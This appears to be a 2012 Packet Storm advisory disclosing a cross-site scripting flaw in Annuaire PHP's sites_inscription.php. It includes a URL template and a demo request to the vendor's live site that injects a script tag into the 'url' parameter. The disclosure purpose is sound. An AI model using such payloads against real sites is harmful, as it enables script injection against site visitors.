Annuaire PHP suffers from a cross site scripting vulnerability.
531b56a91c7900edbaaffe7fd3d0c47f############################################################################
# Exploit Title: Annuaire php
# Date: 16/01/2012
# Author: Atmon3r
# Discovered By: Atmon3r
# Software Link: http://www.annuairephp.com/
# Version: All Version
# Security Risk:: Low
# Tested on: GNU/Linux Ubuntu
############################################################################
# Exploit:
#
http://www.website.com/[path]/referencement/sites_inscription.php?nom=xss&url=[xss]
#
############################################################################
# Demo:
#
http://www.annuairephp.com/referencement/sites_inscription.php?nom=xss&url="><script>alert(1)</script>
#
############################################################################
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!